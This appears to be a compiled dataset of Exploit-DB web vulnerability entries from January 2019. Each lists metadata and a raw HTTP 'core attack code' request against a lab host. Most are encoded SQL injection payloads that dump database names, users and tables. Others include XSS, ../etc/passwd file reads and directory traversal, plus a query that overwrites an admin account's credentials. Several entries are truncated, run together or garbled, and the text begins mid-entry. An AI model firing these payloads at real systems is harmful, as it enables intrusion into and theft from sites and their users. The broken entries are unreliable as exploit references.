GET /10.0.100.24/profile_detail.php?users=-x%27%20UNION%20SELECT+1,2,3,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--%20- HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=3peclhdno4t80jmagl0gurf1o4
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Target program: Craigs Classified Ads CMS Theme
Target environment: Craigs Classified Ads CMS Theme 1.0.2

Date: 2019-01-14 | EDB No.: 46145 | Vulnerability class: SQL Injection | Attack difficulty: Low | Attack risk: Low
Vulnerability name: Find a Place CMS Directory 1.5 - SQL Injection
Core attack code:
GET /10.0.100.24/detail.php?title=&id=2%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1
Target program: Find a Place CMS Directory
Target environment: Find a Place CMS Directory 1.5

Date: 2019-01-14 | EDB No.: 46146 | Vulnerability class: SQL Injection | Attack difficulty: Low | Attack risk: Medium
Vulnerability name: Cleanto 5.0 - SQL Injection
Core attack code:
POST /10.0.100.24/assets/lib/front_ajax.php HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
Cookie: PHPSESSID=hrjvg00694n8qbnctc6buqsrt1; __stripe_mid=2a8f25fc-d13c-4873-96ae-832f3f9d4c11; __stripe_sid=39580a75-f7d8-40ca-aa36-cca625a54f96
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

service_id=%2d%35%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c(selECt(@x)fROm(selECt(@x: =0x00)%2c(@rUNNing_nuMBer
Target program: Cleanto
Target environment: Cleanto 5.0


Date: 2019-01-14 | EDB No.: 46148 | Vulnerability class: SQL Injection | Attack difficulty: Low | Attack risk: High
Vulnerability name: HealthNode Hospital Management System 1.0 - SQL Injection
Core attack code:
GET /10.0.100.24/dashboard/Patient/patientdetails.php?id=-11%2d%31%31%27%20%2f%2a%21%31%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31%31%31%31%31%53%45%4c%45%43%54%2a%2f%20%31%2c%32%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2d%2d%20%2d HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=10ntro6maq17s705ip0e3a9je6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Target program: HealthNode Hospital Management System
Target environment: HealthNode Hospital Management System 1.0

Date: 2019-01-14 | EDB No.: 46151 | Vulnerability class: SQL Injection | Attack difficulty: Low | Attack risk: Low
Vulnerability name: Real Estate Custom Script 2.0 - SQL Injection
Core attack code:
GET /10.0.100.24/index.php?route=property/property_detail&property_id=15912%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=b22e9305c86adea2c071bf2d1053725c; default=78b0c7c7490c09d10765fb78b61bd9a3; language=en-gb; currency=USD; __zlcmid=qMhwOYHc5w0Pnj
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Target program: Real Estate Custom Script
Target environment: Real Estate Custom Script 2.0

Date: 2019-01-14 | EDB No.: 46152 | Vulnerability class: SQL Injection | Attack difficulty: Low | Attack risk: Low
Vulnerability name: Job Portal Platform 1.0 - SQL Injection
Core attack code:
POST /10.0.100.24/index.php?route=tmdblog/blog&blog_id=14%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45(22,%25%34%33%25%34%66%25%34%65%25%34%33%25%34%31%25%35%34%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=b22e9305c86adea2c071bf2d1053725c; default=78b0c7c7490c09d10765fb78b61bd9a3; language=en-gb; currency=USD; __zlcmid=qMhwOYHc5w0Pnj
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Target program: Job Portal Platform
Target environment: Job Portal Platform 1.0

Date: 2019-01-14 | EDB No.: 46154 | Vulnerability class: SQL Injection | Attack difficulty: Medium | Attack risk: Low
Vulnerability name: Bigcart - Ecommerce Multivendor System 1.0 - SQL Injection
Core attack code:
GET /10.0.100.24/index.php?route=product/category&path=%33%33%5f%36%34%31%34%39%39%39%39%39%27%20%2f%2a%21%31%33%33%33%37%50%72%6f%63%65%44%75%72%65%2a%2f%20%41%6e%41%6c%79%73%65%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%63%6f%6e%63%61%74%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: OCSESSID=19eef2415d8afbee8c2f353629; language=en-gb; currency=USD
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Target program: Bigcart - Ecommerce Multivendor System
Target environment: Bigcart - Ecommerce Multivendor System 1.0

Date: 2019-01-15 | EDB No.: 46168 | Vulnerability class: SQL Injection | Attack difficulty: Low | Attack risk: Low
Vulnerability name: ownDMS 4.7 - SQL Injection
Core attack code:
GET /10.0.100.24/includes/pdfstream.php?IMG=%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35,0x48656c6c6f204861636b657220416269,%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2d%2d%20%2d HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=2lj2q69rvodstr9g2c9ki3k3j6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Target program: ownDMS
Target environment: ownDMS 4.7

Date: 2019-01-17 | EDB No.: 46187 | Vulnerability class: XSS | Attack difficulty: Low | Attack risk: Low
Vulnerability name: Oracle Reports Developer Component 12.2.1.3 - Cross-site Scripting
Core attack code:
GET /10.0.100.24/reports/rwservlet/showenv%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3EE HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Connection: close
Upgrade-Insecure-Requests: 1
Target program: Oracle Reports Developer Component
Target environment: Oracle Reports Developer Component 12.2.1.3


Date: 2019-01-18 | EDB No.: 46190 | Vulnerability class: LFI | Attack difficulty: Medium | Attack risk: Low
Vulnerability name: SeoToaster Ecommerce / CRM / CMS 3.0.0 - Local File Inclusion
Core attack code:
POST /10.0.100.24/backend/backend_theme/editcss/ HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
Cookie: hideAdminPanel=0; currSectionOpen=0; PHPSESSID=0u6ftq75vn79fs3512mli59jo3; mwui=eyJhZG1pbnNpZGViYXJwaW4iOiJ0cnVlIn0%3D; back_to_admin=http%3A//localhost/ExploitDb/latest/admin/view%3Asettings
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

getcss=../index.php: undefined
Target program: SeoToaster Ecommerce
Target environment: SeoToaster Ecommerce / CRM / CMS 3.0.0

2019-01-18 46191 SQL Injection 하 하phpTransformer 2016.9 - SQL

Injection

GET /10.0.100.24/Programs/news/GeneratePDF.php?Lang=English&idnews=20190000000%27%20%41%4e%44%20%53%4c%45%45%50%28%35%29%2d%2d%20%2d HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: TryLogin=0; PHPSESSID=2hsc4lr80e0lv14jorun0bs390; browserupdateorg=pause; phpwcmsBELang=en; phpwcmsBEItemsPerPage=25; Contemplate=visitor_ID%3DDzk7W2LkwvYjLr4j-20190117235156; phpTransformer=9th36daohkgnuoqm0mmck5her6; phpTransformerSetup=gtaavf8vg8t63s4qhg98q6pi22; TawkConnectionTime=0; __tawkuuid=e::localhost::L/LRDuMLZaB4u3yegW9pKFQGnt3becl4U6WG0DrN27cIjyTFhHLpZf4VKwUqD3qh::2
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Target program: phpTransformer
Target environment: phpTransformer 2016.9

2019-01-18 46192 Directory Traversal (difficulty: Low, risk: Low) phpTransformer 2016.9 - Directory Traversal

GET /10.0.100.24/Programs/gallery/admin/jQueryFileUploadmaster/server/php/index.php?path=../../../../../../ HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=2hsc4lr80e0lv14jorun0bs390; browserupdateorg=pause; phpwcmsBELang=en; phpwcmsBEItemsPerPage=25; Contemplate=visitor_ID%3DDzk7W2LkwvYjLr4j-20190117235156; phpTransformer=9th36daohkgnuoqm0mmck5her6; phpTransformerSetup=gtaavf8vg8t63s4qhg98q6pi22; TawkConnectionTime=0; __tawkuuid=e::localhost::L/LRDuMLZaB4u3yegW9pKFQGnt3becl4U6WG0DrN27cIjyTFhHLpZf4VKwUqD3qh::2
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Target program: phpTransformer
Target environment: phpTransformer 2016.9

2019-01-18 46200 XSS (difficulty: Medium, risk: Low) Joomla! Core 3.9.1 - Persistent Cross-Site Scripting in Global Configuration Textfilter Settings

POST /10.0.100.24/administrator/index.php?option=com_config HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<target_ip>/administrator/index.php?option=com_config
Content-Type: application/x-www-form-urlencoded
Content-Length: 4303
Connection: close
Cookie: wp-settings-time-1=1540363679; 05e3b315128406acf7dd996046a180f8=__SITE__; 7bb05cf41807f1d0136fbae285e8a16c=1; 783fff54c324d89891f303b51230c499=vnrnl8bo3u62d25ak8tqbruhs2
Upgrade-Insecure-Requests: 1

jform%5Bsitename%5D=testjoomla&jform%5Boffline%5D=0&jform%5Bdisplay_offline_message%5D=1&jform%5Boffline_message%5D=This+site+is+down+for+maintenance.%3Cbr+%2F%3EPlease+check+back+again+soon.&jform%5Boffline_image%5D=&jform%5Bfrontediting%5D=1&jform%5Beditor%5D=tinymce&jform%5Bcaptcha%5D=0&jform%5Baccess%5D=1&jform%5Blist_limit%5D=20&jform%5Bfeed_limit%5D=10&jform%5Bfeed_email%5D=none&jform%

Target program: Joomla! Core
Target environment: Joomla! Core 3.9.1

2019-01-18 46206 File Upload (difficulty: Low, risk: High) Pydio / AjaXplorer < 5.0.4 - Unauthenticated Arbitrary File Upload

get_file&name=../../../../../../../../etc/passwd

Target program: Pydio / AjaXplorer
Target environment: Pydio / AjaXplorer < 5.0.4

2019-01-21 46209 SQL Injection (difficulty: Low, risk: Low) Coman 1.0 - 'id' SQL Injection

GET /10.0.100.24/index.php/framework-crud-detailaction?crud=task&id=1%20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29+%41%53%20%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&backTo=dashboard HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dc
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Target program: Coman
Target environment: Coman 1.0


2019-01-21 46210 SQL Injection (difficulty: Low, risk: Low) Reservic 1.0 - 'id' SQL Injection

GET /10.0.100.24/index.php/framework-crud-detailaction?crud=reserves&id=4+%41%4e%44%28%53%45%4c%45%43%54%20%31+%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29+%41%53%20%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&backTo=dashboard HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)

Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dc
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Target program: Reservic
Target environment: Reservic 1.0

2019-01-21 46211 SQL Injection (difficulty: Low, risk: Low) MoneyFlux 1.0 - 'id' SQL Injection

GET /10.0.100.24/index.php/framework-crud-updateaction?id=1%20%41%4e%44%28%53%45%4c%45%43%54%20%31+%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20AS+%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%6

8%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&crud=expense HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)

Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dc
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Target program: MoneyFlux
Target environment: MoneyFlux 1.0

2019-01-21 46212 SQL Injection (difficulty: Low, risk: Low) PHP Dashboards NEW 5.8 - 'dashID' SQL Injection

GET/10.0.100.24/php/save/savedescriptions.php?dashID=%2d%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35

%2c%36%2c%37%2c%38%2c%39%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%73%63%68%65%6d%61%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%53%43%48%45%4d%41%54%41%29%2c%31%31%2d%2d%20%2dHTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1

Target program: PHP Dashboards NEW
Target environment: PHP Dashboards NEW 5.8

2019-01-21 46213 LFI (difficulty: Medium, risk: Low) PHP Dashboards NEW 5.8 - Local File Inclusion

POST /10.0.100.24/php/file/read.php HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

filename=../../../../../../etc/passwd

Target program: PHP Dashboards NEW
Target environment: PHP Dashboards NEW 5.8

2019-01-21 46214 SQL Injection (difficulty: Low, risk: Low) PHP Uber-style GeoTracking 1.1 - SQL Injection

POST /10.0.100.24/php/profile/index.php HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 354
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

email=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2d%2d%20%2d: undefined

Target program: PHP Uber-style GeoTracking
Target environment: PHP Uber-style GeoTracking 1.1

2019-01-21 46217 SQL Injection (difficulty: Low, risk: High) Adianti Framework 5.5.0 - SQL Injection

(SELECT 'hackeado'),login=(SELECT 'anonymous'),password=(SELECT'294de3557d9d00b3d2d8a1e6aab028cf'),email=(SELECT'[email protected]')WHERE `id`=1#

Target program: Adianti Framework
Target environment: Adianti Framework 5.5.0


2019-01-23 46223 SQL Injection (difficulty: Medium, risk: Low) Joomla! Component vBizz 1.0.7 - SQL Injection

POST /10.0.100.24/index.php? HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 726
Cookie: 84c9f7083d1056c3a8f06ae659d3db0a=9t045qt6rjftqm53itf5uju310; joomla_user_state=logged_in
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

profile_pic=&name=test&username=test&password=&user_role=11&[email protected]&empid=1&department=5&designation=6&phone=&gender=1&blood_group=A%2B&dob=-1-11-30&present_address=&permanent_address=&joining_date=-1-11-30&work_type=permanent&payment_type=bank&pan=&pf_ac=0&bank_ac=0&bank_name=&bank_branch=&ifsc=&leaving_date=-1-11-30&amount[]=111.00&payid[]=7.....

Target program: Joomla! Component
Target environment: Joomla! Component vBizz 1.0.7

2019-01-23 46225 SQL Injection (difficulty: Low, risk: Low) Joomla! Component vWishlist 1.0.1 - SQL Injection

POST /10.0.100.24/ HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 372
Cookie: 1b9dcd66a46474552f38b0164f24ac07=738c74dd230a79b92e8bce29cfd435b9; activeProfile=0; joomla_user_state=logged_in
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

option=com_vwishlist&task=wishlist&wishval=1&userid=711&numofQua

ntity=1&wishQuantshw=1&wishPriceshw=1&wishDatetimeshw=1&vproductid=48%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%3

2,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29

%29,%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58: undefined

Target program: Joomla! Component
Target environment: Joomla! Component vWishlist 1.0.1

2019-01-23 46226 SQL Injection (difficulty: Low, risk: Low) Joomla! Component vAccount 2.0.2 - 'vid' SQL Injection

GET /10.0.100.24/vaccount-dashboard/expense?vid=18%20%20%41%4e%44%20%45%58%54%52%41%43%54%

56%41%4c%55%45%28%32%32,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29,%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1Host: 10.0.100.24:1004

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: 39b5054fae6740372b1521628707bdc7=pusmhir0h1896vr6v5dvmnqd46
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Target program: Joomla! Component
Target environment: Joomla! Component vAccount 2.0.2

2019-01-23 46227 SQL Injection (difficulty: Medium, risk: Low) Joomla! Component vReview 1.9.11 - SQL Injection

POST /10.0.100.24/index.php?option=com_vreview&task=editReview HTTP/1.1
Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 210
Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526; activeProfile=709
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

